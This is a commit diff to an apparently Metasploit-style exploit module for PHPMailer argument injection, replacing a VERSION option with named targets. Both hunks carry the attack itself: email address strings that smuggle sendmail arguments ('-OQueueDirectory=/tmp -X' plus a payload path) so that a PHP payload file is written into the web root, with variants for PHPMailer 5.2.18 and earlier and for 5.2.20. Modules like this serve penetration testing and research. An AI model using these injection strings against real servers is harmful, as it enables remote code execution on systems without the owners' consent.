Use a proper target instead of VERSION

zeroSteiner · zeroSteiner · commit 64037b0d6eea · 2016-12-29T17:37:16.000-05:00
diff --git a/modules/exploits/multi/http/phpmailer_arg_injection.rb b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -39,13 +39,15 @@ def initialize(info = {})
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
       'Payload'        => {'DisableNops' => true},
-      'Targets'        => [['Automatic', {}]],
+      'Targets'        => [
+        ['PHPMailer <=5.2.18', {}],
+        ['PHPMailer 5.2.20', {}]
+      ],
       'DefaultTarget'  => 0
     ))
 
     register_options(
       [
-        OptEnum.new('VERSION', [true, 'The version of PHPMailer', '<=5.2.18', ['<=5.2.18', '5.2.20']]),
         OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
         OptString.new('WEB_ROOT', [true, 'Path to the web root', '/var/www'])
       ], self.class)
@@ -92,9 +94,9 @@ def exploit
     payload_file_name = "#{rand_text_alphanumeric(8)}.php"
     payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
 
-    if datastore['VERSION'] == '<=5.2.18'
+    if target.name == 'PHPMailer <=5.2.18'
       email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
-    elsif datastore['VERSION'] == '5.2.20'
+    elsif target.name == 'PHPMailer 5.2.20'
       email = "\\\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\\\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
     else
       fail_with(Failure::NoTarget, 'The specified version is not supported')
